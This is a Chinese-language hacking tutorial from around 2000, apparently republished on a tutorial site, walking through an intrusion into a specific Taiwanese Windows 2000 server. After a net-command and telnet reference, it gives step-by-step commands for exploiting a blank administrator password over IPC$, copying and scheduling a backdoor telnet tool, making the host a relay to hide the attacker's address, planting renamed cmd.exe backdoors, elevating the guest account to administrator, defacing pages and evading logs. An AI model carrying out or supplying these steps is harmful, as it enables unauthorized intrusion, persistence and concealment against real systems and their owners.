我要投稿
  • 您当前的位置:57365.com -> 技术教程 -> 操作系统教程 -> Win2003NT教程 -> 教程内容
  • [ 收藏本页教程 ]
  • NT简单入侵教程

    教程作者:本站    教程来源:本站整理   教程栏目:Win2003NT教程    收藏本页

    NT简单入侵教程
    2001-04-18.21:49:03

     

    《中国红客网络安全技术联盟》

    http://www.cnhonker.com

    Honker Union of China 
      

     

      《NT简单入侵教程

    ------------------

     

    今天我们来看看一次台湾NT主机的入侵过程。

     

    所工具:流光2000

    下载地址: 小榕网站:http://www.netxeyes.com 

     

    建议你装一个NT4.0 /Win2000

    才能更好的发挥软件和命令的功能.

     

    小榕的流光2000安装目录下的IpcHowTo . tools 这两个目录有教程和工具.大家也可以看看他的教程.但我发现里面有的解决方法不是最好的,这里,我来说说我的入侵步骤.:)

     

    大家可能都不知道 IPC 连接是什么东西.

    我们来看看IPC

      它本来是UNIX的进程间通讯的意思,这里我们说的是Windows下的IPC,他主要是共享命名管道的资源,它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用。

    在Windows 下,它是用 Net 命令来实现的.

      在检测报告中我们很常可以看到 空连接 的字样,很多人不知道什么是空连接,他其实就是不用密码和用户名的IPC连接.具体为

      net use //IP "" /user:""

     

    下面是 NET 命令的基本用法

     

    综合了WINDOWS 98,WINDOWS WORKSTATION和WINDOWS SERVER 三个操作系统关于NET命令的解释,希望可以全面一些。

     

    先说一些:

    (1)NET命令是一个命令行命令。

    (2)管理网络环境、服务、用户、登陆。。。。等本地信息

    (3)WIN 98,WIN WORKSTATION和WIN NT都内置了NET命令。

    (4)但WIN 98的NET命令和WORKSTATION、NT的NET命令不同。

    (5)WORKSTATION和SERVER中的NET命令基本相同。

    (6)获得HELP

      (1)在NT下可以用图形的方式,开始-》帮助-》索引-》输入NET

      (2)在COMMAND下可以用字符方式,NET /?或NET或NET HELP得到一些方法 相应的方法的帮助NETCOMMAND /HELP或NET HELP COMMAND 或NET COMMAND /? 另对于错误NET HELPMSG MESSAGE#是4位数

    (7)强制参数 所有net命令接受选项/yes和/no(可缩写为/y和/n)。[简单的说就是预先给系统的 提问一个答案]

    (8)有一些命令是马上产生作用并永久保存的,使用的时候要慎重

    (9)对于NET命令的功能都可以找到相应的图形工具的解决方案

    (10)命令的组成 命令 参数 选项  参数 选项  参数 选项 。。。。。。 瘰疬罗嗦说了一大堆,其实就是6和7有用,呵呵 另有两件事:

      (1)在NT的NET命令中有一些参数是只有在SERVER环境中才能使用的

      (2)在WIN98的NET命令中有一些参数不能在DOS-WIN中使用,只能在DOS环境中使用

     

    下面对NET命令的不同参数的基本用法做一些初步的介绍:

    (1)NET VIEW

    作 用:显示域列表、计算机列表或指定计算机的共享资源列表。

    命令格式:net view [//computername  /domain[:domainname]]

    参数介绍:

      (1)键入不带参数的net view显示当前域的计算机列表。

      (2)//computername 指定要查看其共享资源的计算机。

      (3)/domain[:domainname]指定要查看其可用计算机的域。

    简单事例:

      (1)net view //YFANG查看YFANG的共享资源列表。

      (2)net view /domain:LOVE查看LOVE域中的机器列表。

     

    (2)NET USER

    作 用:添加或更改用户帐号或显示用户帐号信息。该命令也可以写为 net users。

    命令格式:net user [username [password  *] [options]] [/domain]

    参数介绍:

      (1)键入不带参数的net user查看计算机上的用户帐号列表。

      (2)username添加、删除、更改或查看用户帐号名。

      (3)password为用户帐号分配或更改密码。

      (4)*提示输入密码。

      (5)/domain在计算机主域的主域控制器中执行操作。

    简单事例:

      (1)net user yfang查看用户YFANG的信息

     

    (3)NET USE

    作 用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。

    命令格式:net use [devicename  *] [//computername/sharename[/volume]] [password  *]] [/user:[domainname/]username] [[/delete]  [/persistent:{yes  no}]]

    参数介绍:

      键入不带参数的net use列出网络连接。

      devicename指定要连接到的资源名称或要断开的设备名称。

      //computername/sharename服务器及共享资源的名称。

      password访问共享资源的密码。

      *提示键入密码。

      /user指定进行连接的另外一个用户。

      domainname指定另一个域。

      username指定登录的用户名。

      /home将用户连接到其宿主目录。

      /delete取消指定网络连接。

      /persistent控制永久网络连接的使用。

    简单事例:

      (1)net use e: //YFANG/TEMP将//YFANG/TEMP目录建立为E盘

      (2)net use e: //YFANG/TEMP /delete断开连接

     

    (4)NET TIME

    作 用:使计算机的时钟与另一台计算机或域的时间同步。

    命令格式:net time [//computername  /domain[:name]] [/set]

    参数介绍:

      (1)//computername要检查或同步的服务器名。

      (2)/domain[:name]指定要与其时间同步的域。

      (3)/set使本计算机时钟与指定计算机或域的时钟同步。

    下面的这4个参数是相关的,所以一起介绍

     

    (5)Net Start

    作 用:启动服务,或显示已启动服务的列表。

    命令格式:net start service

     

    (6)Net Pause

    作 用:暂停正在运行的服务。

    命令格式:net pause service

     

    (7)Net Continue

    作 用:重新激活挂起的服务。

    命令格式:net continue service   

     

    (8)NET STOP

    作 用:停止 Windows NT 网络服务。

    命令格式:net stop service

    参数介绍:我们来看看这些服务都是什么

      (1)alerter(警报)

      (2)client service for netware(Netware 客户端服务)

      (3)clipbook server(剪贴簿服务器)

      (4)computer browser(计算机浏览器)

      (5)directory replicator(目录复制器)

      (6)ftp publishing service (ftp )(ftp 发行服务)

      (7)lpdsvc

      (8)net logon(网络登录)

      (9)network dde(网络 dde)

      (10)network dde dsdm(网络 dde dsdm)

      (11)network monitor agent(网络监控代理)

      (12)nt lm security support provider(NT LM 安全性支持提供)

      (13)ole(对象链接与嵌入)

      (14)remote access connection manager(远程访问连接管理器)

      (15)remote access isnsap service(远程访问 isnsap 服务)

      (16)remote access server(远程访问服务器)

      (17)remote procedure call (rpc) locator(远程过程调用定位器)

      (18)remote procedure call (rpc) service(远程过程调用服务)

      (19)schedule(调度)

      (20)server(服务器)

      (21)simple tcp/ip services(简单 TCP/IP 服务)

      (22)snmp

      (23)spooler(后台打印程序)

      (24)tcp/ip netbios helper(TCP/IP NETBIOS 辅助工具)

      (25)ups

      (26)workstation(工作站)

      (27)messenger(信使)

      (28)dhcp client

      (29)eventlog 以下这些SERVICE只能在NT SERVER上使用

        (1)file server for macintosh

        (2)gateway service for netware

        (3)microsoft dhcp server

        (4)print server for macintosh

        (5)remoteboot

        (6)windows internet name service

     

    (9)Net Statistics

    作 用:显示本地工作站或服务器服务的统计记录。

    命令格式:net statistics [workstation  server]

    参数介绍:

      (1)键入不带参数的net statistics列出其统计信息可用的运行服务。

      (2)workstation显示本地工作站服务的统计信息。

      (3)server显示本地服务器服务的统计信息。

    简单事例:

      (1)net statistics server  more显示服务器服务的统计信息

     

    (10)Net Share

    作 用:创建、删除或显示共享资源。

    命令格式:net share sharename=drive:path [/users:number  /unlimited] [/remark:"text"]

    参数介绍:

      (1)键入不带参数的net share显示本地计算机上所有共享资源的信息。

      (2)sharename是共享资源的网络名称。

      (3)drive:path指定共享目录的绝对路径。

      (4)/users:number设置可同时访问共享资源的最大用户数。

      (5)/unlimited不限制同时访问共享资源的用户数。

      (6)/remark:"text "添加关于资源的注释,注释文字用引号引住。

    简单事例:

      (1)net share mylove=c:/temp /remark:"my first share"以mylove为共享名共享C:/temp

      (2)net share mylove /delete停止共享mylove目录

     

    (11)Net Session

    作 用:列出或断开本地计算机和与之连接的客户端的会话,也可以写为net sessions或net sess。

    命令格式:net session [//computername] [/delete]

    参数介绍:

      (1)键入不带参数的net session显示所有与本地计算机的会话的信息。

      (2)//computername标识要列出或断开会话的计算机。

      (3)/delete结束与//computername计算机会话并关闭本次会话期间计算机的所有? 蚩?募??

    简单事例:

      (1)net session //YFANG要显示计算机名为YFANG的客户端会话信息列表。

     

    (12)Net Send

    作 用:向网络的其他用户、计算机或通信名发送消息。

    命令格式:net send {name  *  /domain[:name]  /users} message

    参数介绍:

      (1)name要接收发送消息的用户名、计算机名或通信名。

      (2)*将消息发送到组中所有名称。

      (3)/domain[:name]将消息发送到计算机域中的所有名称。

      (4)/users将消息发送到与服务器连接的所有用户。

      (5)message作为消息发送的文本。

    简单事例:

      (1)net send /users server will shutdown in 5 minutes.给所有连接到服务器的用户发送消息

     

    (13)Net Print

    作 用:显示或控制打印作业及打印队列。

    命令格式:net print [//computername ] job# [/hold  /release  /delete]

    参数介绍:

      (1)computername共享打印机队列的计算机名。

      (2)sharename打印队列名称。

      (3)job#在打印机队列中分配给打印作业的标识号。

      (4)/hold使用 job# 时,在打印机队列中使打印作业等待。

      (5)/release释放保留的打印作业。

      (6)/delete从打印机队列中删除打印作业。

    简单事例:

      (1)net print //YFANG/SEEME列出//YFANG计算机上SEEME打印机队列的目录

     

    (14)Net Name

    作 用:添加或删除消息名(有时也称别名),或显示计算机接收消息的名称列表。

    命令格式:net name [name [/add  /delete]]

    参数介绍:

      (1)键入不带参数的net name列出当前使用的名称。

      (2)name指定接收消息的名称。

      (3)/add将名称添加到计算机中。

      (4)/delete从计算机中删除名称。

     

    (15)Net Localgroup

    作 用:添加、显示或更改本地组。

    命令格式:net localgroup groupname {/add [/comment:"text "]  /delete} [/domain]

    参数介绍:

      (1)键入不带参数的net localgroup显示服务器名称和计算机的本地组名称。

      (2)groupname要添加、扩充或删除的本地组名称。

      (3)/comment: "text "为新建或现有组添加注释。

      (4)/domain在当前域的主域控制器中执行操作,否则仅在本地计算机上执行操作?

      (5)name [ ...]列出要添加到本地组或从本地组中删除的一个或多个用户名或组名。

      (6)/add将全局组名或用户名添加到本地组中。

      (7)/delete从本地组中删除组名或用户名。

    简单事例:

      (1)net localgroup love /add将名为love的本地组添加到本地用户帐号数据库

      (2)net localgroup love显示love本地组中的用户

     

    (16)Net Group

    作 用:在 Windows NT Server 域中添加、显示或更改全局组。

    命令格式:net group groupname {/add [/comment:"text "]  /delete} [/domain]

    参数介绍:

      (1)键入不带参数的net group显示服务器名称及服务器的组名称。

      (2)groupname要添加、扩展或删除的组。

      (3)/comment:"text "为新建组或现有组添加注释。

      (4)/domain在当前域的主域控制器中执行该操作,否则在本地计算机上执行操作? ?

      (5)username[ ...]列表显示要添加到组或从组中删除的一个或多个用户。

      (6)/add添加组或在组中添加用户名。

      (7)/delete删除组或从组中删除用户名。

    简单事例:

      (1)net group love yfang1 yfang2 /add将现有用户帐号yfang1和yfang2添加到本地计算机的love组

     

    (17)Net File

    作 用:显示某服务器上所有打开的共享文件名及锁定文件数。

    命令格式:net file [id [/close]]

    参数介绍:

      (1)键入不带参数的net file获得服务器上打开文件的列表。

      (2)id文件标识号。

      (3)/close关闭打开的文件并释放锁定记录。

     

    (18)Net Config

    作 用:显示当前运行的可配置服务,或显示并更改某项服务的设置。

    命令格式:net config [service [options]]

    参数介绍:

      (1)键入不带参数的net config显示可配置服务的列表。

      (2)service通过net config命令进行配置的服务(server或workstation)

      (3)options服务的特定选项。

     

    (19)Net Computer

    作 用:从域数据库中添加或删除计算机。

    命令格式:net computer //computername {/add  /del}

    参数介绍:

      (1)//computername指定要添加到域或从域中删除的计算机。

      (2)/add将指定计算机添加到域。

      (3)/del将指定计算机从域中删除。

    简单事例:

      (1)net computer //cc /add将计算机 cc 添加到登录域

     

    (20)Net Accounts

    作 用:更新用户帐号数据库、更改密码及所有帐号的登录要求。

    命令格式:net accounts [/forcelogoff:{minutes  no}] [/minpwlen:length] [/maxpwage:{days  unlimited}] [/minpwage:days] [/uniquepw:number] [/domain]

    参数介绍:

      (1)键入不带参数的net accounts显示当前密码设置、登录时限及域信息。

      (2)/forcelogoff:{minutes  no}设置当用户帐号或有效登录时间过期时

      (3)/minpwlen:length设置用户帐号密码的最少字符数。

      (4)/maxpwage:{days  unlimited}设置用户帐号密码有效的最大天数。

      (5)/minpwage:days设置用户必须保持原密码的最小天数。

      (6)/uniquepw:number要求用户更改密码时,必须在经过number次后才能重复使用 与之相同的密码。

      (7)/domain在当前域的主域控制器上执行该操作。

      (8)/sync当用于主域控制器时,该命令使域中所有备份域控制器同步

    简单事例:

      (1)net accounts /minpwlen:7将用户帐号密码的最少字符数设置为7

     

    ----------------------上面介绍的是NET命令在WINNT下的基本用法

     

    ----------------------下面我们看看NET命令在WIN98下的基本用法

    在WIN98中NET命令也有一些参数的名字和功能及简单的使用方法和WINNT下的相应的参数的用法相同

    其中有

      (1)NET TIME命令

      (2)NET PRINT命令

      (3)NET USE命令

      (4)NET VIEW命令

     

    在WIN98中NET命令有一些参数的名字和WINNT下的相应的参数的名字相同,但其用法却有些不同

    其中有

    (1)NET START

    作 用:启动相应的服务。(不能在DOS-WIN中用)

    命令格式:NET START [BASIC  NWREDIR  WORKSTATION  NETBIND  NETBEUI  NWLINK] [/LIST] [/YES] [/VERBOSE]

    (2)NET STOP

    作 用:停止相应的服务.(不能在DOS-WIN中用)

    命令格式:NET STOP [BASIC  NWREDIR  WORKSTATION  NETBEUI  NWLINK] [/YES]

     

    在WIN98中NET命令还有一些参数是在98下才有的

    其中有

    (1)NET DIAG

    作 用:运行MS的DIAGNOSTICS程序显示网络的DIAGNOSTIC信息

    命令格式:NET DIAGNOSTICS [/NAMES  /STATUS]

    (2)NET INIT

    作 用:不通过绑定来加载协议或网卡驱动(不能在DOS-WIN中用)

    命令格式:NET INITIALIZE [/DYNAMIC]

    (3)NET LOGOFF

    作 用:断开连接的共享资源(不能在DOS-WIN中用) (

    (4)NET LOGON

    作 用:在WORKGROUP中登陆(不能在DOS-WIN中用)

    命令格式:NET LOGON [user [password  ?]] [/DOMAIN:name] [/YES] [/SAVEPW:NO]

    (5)NET PASSWORD

    作 用:更改你的网络登陆口令(不能在DOS-WIN中用)

    命令格式:NET PASSWORD //computer  /DOMAIN:name [user [oldpassword [newpassword]]]

     

    同时我们也最好知道一些Telnet的知识.

     

    远程联线(TELNET)

    一. 关於远程联线

       远程联线是一个不可思议的工具, 它让您超越时空一般的使用远端的电脑系统。有了远程联线, 电脑软硬体资源的分享变得很有效率, 打个比喻来说, 您可以连线载入位於某处的超级电脑(假设您有存取权), 做天体模拟运算, 当结果迅速的产生时, 您可以将资料传送到另一部图形模拟工作站, 由那里产生一份实体模拟图。在这例子中, 您先後用到了一部超级电脑以及一部图形处理工作站, 而您双手真正接触到的, 很可能是一部位於实验室的个人电脑(PC), 可是其他这两台电脑可能在什麽地方也不知道!是的, 您一点也无须知道, 通过Internet的远程联线工具, 您只需到知道那里有您要的CPU时间,以及应用软件, 如此而已。 远程联线可以应用於跨越时空的环境, 当然也同样适用於办公室区域网络间, 一台电脑模拟成另一台电脑的终端机而连线载入对方系统。

     

    什麽是Telnet?

      也许读者们听说过Telnet是一种通讯协定之一, 对於这种说法, 您大可以忽略掉。 读者不妨简单的想, Telnet就是让刚刚以上的说明成为具体可行的一个实际的工具, 也就是说, 我们只是单纯的视Telnet为一个执行远程联线的工具之一, 让一台电脑连线载入另外一部电脑。 笔者记得前面已经提到很多次, 在网络上的应用程式多半是采用Client/Server模式, 用中文来说, 也就是一定有一端是请求端, 请求端执行Telnet请求程式。在主机这一端则有装置有伺服程式来接受连线请求,不过在多半的情况, 主机端则Client与Server两者都有。 远程联线的使用程序与您平常在本地通过电话线或任何其他方式载入一部主机并没有很大不一样, 您在对方主机一定要有一个私人使用帐号,以及您的通行密码, 这样子您才有办法连线进入该主机系统。细节上请参考下面的示意。另外, 在Internet上, 有相当多的各式各样服务系统也是通过这方式来提供服务, 其中决大部分是免费的服务, 像是Hytelnet、BBS、Gopher及Archie等等就是, 这类系统通常开放有公用帐号, 且无须使用密码。 Telnet在功能上, 是模拟成远端一部电脑系统的终端机, 通过网络连线载入该电脑系统。假如您实验室中有跑DOS的个人电脑, 该电脑也已经连结上校园网络, 您可以请人帮您装设一套NCSA Telnet软件, 之後您就可以做笔者以上所介绍的这些不可思议的事情 (笔者一直都没有吹牛:-) )。 NCSA Telnet是专门为DOS设计的一个请求程式, 至於在Unix机器上, 您就无须担心, 因为Unix是网络的天生好手, 它一出厂就已经具备有Telnet这东西, 而且通常是请求程序与服务程序同时具备。

     

    二. 例:远程联线远端某个主机系统

    ┌??????????????????????????????????????????┐

    │ $ telnet jet.ncic1.ac.cn ← 连线                          │

    │ Trying 159.226.43.26...                               │

    │ Connected to 159.226.43.26                             │

    │ Escape character is '^]'.                              │

    │                                           │

    │ SunOS UNIX (sparc4) (连线成功)                           │

    │                                           │

    │ login: feng ←输入账号 password:******* ←输入密码                 │

    │ Last login: Thu Dec 30 11:37:17 from 159.226.43.45                 │

    │ SunOS Release 4.1.1 (sparc15) #1: Tue Nov 12 05:15:31 CST 1996           │

    │                                           │

    └??????????????????????????????????????????┘

     

      远程联线就是这麽简单,上面的操作就是一个典型远程联线的应用,我们应用远程联线的功能,来取用远端某一台主机系统提供的某某公共服务系统, 至於很多商业性服务系统也可以用这方式来连线进入。 在Internet, 我们可以发现很多有趣的服务系统, 比方说,假如您喜欢下棋, 您也找得到一些围棋服务系统, 利用这系统您可以与另外一个人下围棋 ( 注意是对手是「人」, 而您可能不知道对手人在地球的那个角落, 妙哉! ) , 其他像是网络游戏系统(比方MUD)您有时间也可以一试。其他的服务系统像是BBS、IRC及Gopher等等也可以通过Telnet来取得服务。

     

    三. Telnet、Tn3270 浅介

      远程联线时, 您只须知道几个Telnet的指令, 大抵如何连线, 如何中途执行本端指令 (您自己主机这一端) , 如何结束连线及万一不得已时使用的中断连线等等。Telnet的使用并没有像FTP有很多独特的操作指令。 不论在DOS或Unix环境, Telnet 都是个非常容易的指令, 您几乎不需要任何学习, 您该知道的顶多只是一开始的连线动作, 以及最後要退出对方系统时的操作程序, 以下笔者只介绍两个指令: Unix下的telnet与tn3270在操作上几乎是一样的, 所不同者, 只因为所连线对方系统并不一样, 所以操作程序稍稍有异, 所以您要注意的只是,「遵照」对方系统的要求程序来中断连线即可。举例来说, 您用tn3270连线IBM VM系统时, 「logoff」 (大小写不拘) 就是您结束连线的指令, 您 除非不得已, 不要用Unix″kill″指令来结束连线。 在Unix下, 无论telnet或 tn3270, 您都可以按CTRL-] (CTRL 键及]键同时按, 有时得按两次 ) 暂时回到 telnet/tn3270 环境, 这时您可以执行telnet/tn3270本身的指令, 会出现下面画面。

    ┌??????????????????????????????????????????┐

    │ telnet> ?    ← ? 符号求助                            │

    │ Commands may be abbreviated. Commands are:                     │

    │                                          │

    │ close close current connection                           │

    │ display display operating parameters                        │

    │ mode try to enter line-by-line or character-at-a-time mode             │

    │ open connect to a site                               │

    │ quit exit telnet                                  │

    │ send transmit special characters ('send ?' for more)                │

    │ set set operating parameters ('set ?' for more)                   │

    │ status print status information                          │

    │ toggle toggle operating parameters ('toggle ?' for more)              │

    │ z suspend telnet                                  │

    │ ? print help information                              │

    │ telnet>                                       │

    │                                          │

    │ toggle toggle operating parameters ('toggle ?' for more)              │

    │ z suspend telnet                                  │

    │ ? print help information                              │

    │ telnet> status ← 查看目前连线状况                         │

    │ No connection.                                   │

    │ Escape character is '^]'.                             │

    │ telnet> z ← 暂时回到本地的shell, 把连线作业放在背景                │

    │                                           │

    │ [1] + Stopped telnet                                │

    │ [^C] interrupt.                                   │

    │ [^U] kill.                                     │

    │ [^/] quit.                                     │

    │ [^D] eof.                                      │

    │                                           │

    │ $ fg ← 将连线切回前台 (回到telnet)                         │

    │ telnet                                       │

    │                                           │

    │ telnet> q ← 中断连线 (不被鼓励使用)                        │

    │ $                                          │

    └??????????????????????????????????????????┘     另外, 从telnet回到连线, 只须在telnet> 提示符号下按键即可。以上说明同样应用於tn3270, 这里笔者不另外说明。  最後, 笔者只能告诉您, Telnet本身非常容易操作及了解, 这是为什麽本节没有举很多例子。而 Telnet 所能连线的系统才是您所要认识的,Telnet 可以说只是一个桥梁而已, 您行走过该桥时, 大可不知道该桥是那些工匠或用那些材料造的。

     

    好了,我们来转入正题.

    :)

     

    我们先用流光扫描一段国外的网址的NT机器,然后用流光的IPC的简单探测功能就可以很容易找到愚蠢的网络管理员,象我扫描了五个小时台湾网段找到1822个密码一样.

    如果你不会用流光,请看流光2000的 IpcHowTo 目录下的帮助文件.这里我就不再多说了.

    大家也可以用我两次公布的NT密码.应该还有很多没改掉的.这个也是在那里面找的台湾NT.:)

     

    现在假设我们成功的探测到了台湾的NT主机211.21.193.202的超级管理员administrator的密码为空.

    流光的探测报告上会有如下类似的信息.

     

    Server: 211.21.193.202 UserName: administrator (Admin) Password: 【空】 致命的漏洞

    Http Server Type: Microsoft-IIS/5.0

    Start Page Title: ?ㄣ痴??

      

    从Http Server Type: Microsoft-IIS/5.0 我们就可以看到他应该是一台Win2000并安装装了Web服务,如果是Microsoft-IIS/4.0或更低版本的,那就是NT 4.0以下的机器了.

    (建议大家都找Win2000来实验,因为Win2000自带了Telnet守护程序,而NT要另外安装, Win2000下的我们很容易将Telnet 改成我们需要的跳板,进而用来攻击其他网络主机时,可以用来隐藏自己的真实的IP地址,用NT的跳板有一个比用UNIX跳板的好处,UNIX的跳板比NT的难找,所以我们就利用这随手可得的Win2000来为我们做做事.呵呵:)

     

    下面就是我们在211.21.193.202上超级管理员administrator的密码为空时,进行远程登陆的步骤.注意,要超级管理员的密码才能有更好的执行权限.

     

    NT远程登陆的命令行语法:net use //IP Address/IPC$ ["password"] /user:"username"

    退出登陆的语法:net use //IP Address/IPC$ /delete

     

    net use //211.21.193.202/ipc$ "" /user:"administrator"

     

    如果显示:

    命令成功完成

     

    那我们的通过IPC的远程登陆就成功了.

     

    登陆成功之后先复制一个Telnet的程序上去(小榕流光安装目录下的Tools目录里的Srv.exe) ,这个程序是在NT上面开一个Telnet服务,端口是99。

     

    copy e:/honker/srv.exe //211.21.193.202/admin$

     

    admin$是NT的默认的隐藏共享,他对应的是NT安装目录里的system32目录.通常是在c:/winnt/system32,你也可以用C$ , D$ 他们分别代表盘符C盘,D盘.都是系统的默认共享.

    通常我们把程序拷贝到admin$,因为这里的文件比较多,不容易被发现.同时启动时也不必指定具体目录.:)

     

    主机显示:

    e:/honker/srv.exe

    已复制 1 个文件。

     

    我们的拷贝就成功了.

    (如果你只是想黑他,那么:copy e:/honker/index.htm //ip/c$/inetpub/wwwroot 就可以了.但具体要看主机的具体的主页的真实路径和起始文件,可以用http://ip/i.ida来看物理路径.默认的用上上面的命令就可以了.这里我们不要黑他,我们只是用它来为我们做事:)

     

     

    一步就是如何启动这个程序的问题。NT上面有Schedule(定时)服务,我们利用它来启动这个程序。首先看一下对方此时的时间,以便决定何时启动。

      

    net time //211.21.193.202

     

    显示:

    //211.21.193.202 的当前时间是 2000/12/24 下午 08:55

    命令成功完成。

     

    我们可以看到主机的时间是2000/12/24 下午 08:55

    (这里有一个问题,如果两台机器在不同的时区,上面的显示还有一行,它用来表示目标主机的当前时间,我们取时间时要与这个当前时间为准,同时我们要把显示的时间换成24小时制.比如上面的"下午 08:55 " 时间对应24小时制就是 20:55分,我们要的是这个时间.:)

     

    at 的命令格式是 at //ip 目标主机的本地时间 要用时间定时服务启动的程序

     

    这里我们的是

    at //211.21.193.202 21:00 srv.exe 

     

    显示:

    新加了一项作业,其作业 ID = 0

     

    我们的服务成功添加了.

    (如果显示"服务仍未启动"的话,对方就是没有启动Schedule(定时)服务。由于此时我们已经是Administrator,所以可以利用微软的NT Rtk(可以在其站点下载)中的NetSvc来远程启动Schedule服务。

    NetSvc在小榕流光2000的安装目录下的tools目录下.

    远程启动方法为:netsvc //211.21.193.202 Schedule /start

    具体大家可以看流光里面的教程.然后我们再用at命令来启动它.

    我们也可以这样:copy e:/honker/srv.exe //211.21.193.202/c$/inetpub/scripts

    把srv.exe拷贝到 c:/inetpub/scripts,也就是IIS的scripts目录.

    然后我们用浏览器启动它:http://ip/scripts/srv.exe就可以了.

    但是这样启动的srv.exe权限不够,所以我们仍然用at 命令来启动好一些.:)

     

    等候几分钟,我们就可以telnet 上去了.

     

    telnet 211.21.193.202 99

     

    (srv.exe开的端口是99.这里我们就telnet ip 99

    这个程序好在不用输入口令和没有日志记录.但是每一次使用后都会自动关闭,下次要用时要重新启动,才能再用.)

     

    这里显示:

    Microsoft Windows 2000 [?セ 5.00.2195]

    (C) Copyright 1985-1999 Microsoft Corp.

     

    C:/WINNT/system32>

     

    我们就成功登陆上去了.

     

    这时,我们要把他做成跳板,

    但我们还有一个文件没上传.具体为什么要这样做才能做好NT的跳板,流光的帮助文件里有很详细的介绍,这里我们就不再说了.我们照着做就可以了:)

     

    先在本地开一个DOS窗口,然后

    copy e:/honnker/ntlm.exe //211.21.193.202/admin$

    把文件拷贝过去,

     

    再回到telnet 窗口,来运行我们刚上传的程序:这里我们敲入 ntlm就可以了.

     

    C:/WINNT/system32>ntlm

     

    显示:

    Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.

    Done!

     

    C:/WINNT/system32>

    C:/WINNT/system32>

     

    说明我们就成功了.:)

    然后我们用 net 命令来停止telnet并重新启动这个服务,net stop telnet 停止telnet服务

     

    C:/WINNT/system32>net start telnet

    ?ゼ币笆 Telnet ?叭?

    冈灿戈??叫块? NET HELPMSG 3521?

     

    这里是繁体的win2000所以我们看不到具体的内容,但他报告的是错误,:)因为目标主机并没有启动telnet服务.如果目标猪机没有开telnet 服务,这个停止telnet 服务的步骤可以省略.直接启动tlenet服务就可以了.:)

     

    启动telnet服务方法为:net start telnet

     

    C:/WINNT/system32>net start telnet

    Telnet ?叭タ?币笆 .

    Telnet ?叭??币笆Θ?

     

    这里是繁体的win2000所以我们看不到具体的内容,但是命令是成功执行了,服务也启动成功了.

     

    OK,一个跳板做成功了,我们可以telnet 211.21.193.202 来连上目标主机了,并且我们现在可以用他来telnet上其他的机器而不会没有输出反应了.:)

     

    大家可以试一下

    telnet 211.21.193.202

     

    NTLM Authentication failed due to insufficient credentials. Please login with

    clear text username and password

    Microsoft (R) Windows (TM) Version 5.00 (Build 2195)

    Welcome to Microsoft Telnet Service Telnet Server Build 5.00.99201.1

    login:

     

    login:dministrator   ===>(我们敲入要登陆的用户帐号,这里是administrator,然后回车)

     

    password:        ===>(我们敲入登陆帐号的密码,这里administrator的密码是空,我们                 只要回车就可以了.)

     

    显示:

    *===============================================================

    ??ㄏノ Microsoft Telnet Server? *===============================================================

    C:/>

     

    呵呵

    我们登陆成功了.:)跳板真正成功并用上了.

    (小榕流光里面的教程关于跳板里的有一个地方是写得不太好的!

    就是他是用netsvc 命令来停止和启动启动telnet的.太麻烦.大家可以看看小榕文章里面的原文:

      "为了使修改生效,我们需要重新启动对方主机上面的Telnet Server。 "

      他的上面的图形上的执行的命令是: 

      "netsvc //203.183.8.99 telnet /stop"

      停止telnet 服务后再用

      "netsvc //203.183.8.99 telnet /start"

      来启动telnet服务的

    其实我们只要在telnet 211.21.193.202 99 时,直接执行ntlm后,接着执行

    net stop telnet

    net start tlenet

    就可以了.

    这也就是我为什么到处都有NT入侵的教程还写这篇文章的原因了.呵呵

    你是用我的方法还是用小榕的方法呢?你选那个呢?

    呵呵:)

     

    这时我们要留下一个后门,比如把srv.exe 放在c:/inetpub/scripts

    以便管理员改了密码后,下次再次可以通过浏览器访问这台机器.虽然这样启动的权限比教小,但我们仍然可以做很多事情.注意只能改成*.exe文件哦呵呵,这里我们执行:

     

    C:/>copy c:/winnt/system32/srv.exe c:/inetpub/scripts

    ?参тぃ????郎?

     

    拷贝成功!:)

    当然我们也可以把c:/winnt/system32/cmd.exe拷贝到c:/inetpub/scripts下并改成另外一个名字.比如chat.exe:)也是下次获得再次访问的好方法.具体大家看哪个可执行目录好用一些,隐蔽一些就把cmd.exe改成你要的文件名后藏在那里吧,以免被管理员发现后删掉.呵呵,注意只能改成*.exe文件哦.在这里我们执行

     

    C:/>copy c:/winnt/system32/cmd.exe c:/inetpub/scripts/chat.exe

    狡?? 1 ?郎??

     

    拷贝成功.

    大家可以拷贝到其他可执行目录里,以增加隐蔽性.:)

     

    当然我们把目标机器的guest帐号激活并把它添加到管理员组是最好的.

     

    下面我们继续为自己留一个guest用户后门。在telnet中大家照着步骤做就可以了.:)

     

    1、将Guest用户激活:

    net user guest /active:yes 

     

    C:/>net user guest /active:yes ?

    ?磅?Θ??

     

    2、将Guest的密码改为cnhonker 或者你要设定的密码.

    net user guest cnhonker

     

    C:/>net user guest cnhonker

    ?磅?Θ??

     

    3、将Guest变为Administrator

    C:/>net localgroup administrators guest /add ?

    ?磅?Θ??

     

    如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机.

    哈哈,后门也够多了吧.:)

     

    好了,我们敲exit退出吧

    一次攻击结束,呵呵

     

    其实我很喜欢用这些肉鸡来跑小榕的流影的.呵呵,只是没有谁的信箱可以跑.:)

    当然NT下面也是存在日志问题的.一般在c:/winnt/system32/logfiles下面,我们要用pslist 和 pskill 来杀掉系统进程才能删掉相应的记录,太麻烦了,这里是入侵台湾,不是国内的NT,所以我们这里就不做那么干净了.

    :)

    其实是太晚了,今天是圣诞节平安夜,23:02分,我还在计算机旁边为大家写教程.实在没时间了,要回去了.明天9:00还要上班.倒:(

     

    最后祝大家圣诞节快乐!

    :)

     

     

    下期教程预告:

    《UNIX系列入侵教程

    将分为好几个部分陆续推出.当然先讲的会是最主要的如何获得第一个帐号.:)

     

     

    有空多去社区看看。

    多支持我们的红客联盟哦。

    :)

     

    Lion

     

    OICQ:5437211

    bunny_lion@21cn.com

    http://www.cnhonker.com

    http://coollion.3322.net 

    我要投稿   -   广告合作   -   关于本站   -   友情连接   -   网站地图   -   联系我们   -   版权声明   -   设为首页   -   加入收藏   -   网站留言
    Copyright © 2009 - 20012 www.www.hxswjs.com All Rights Reserved.57365.com 版权所有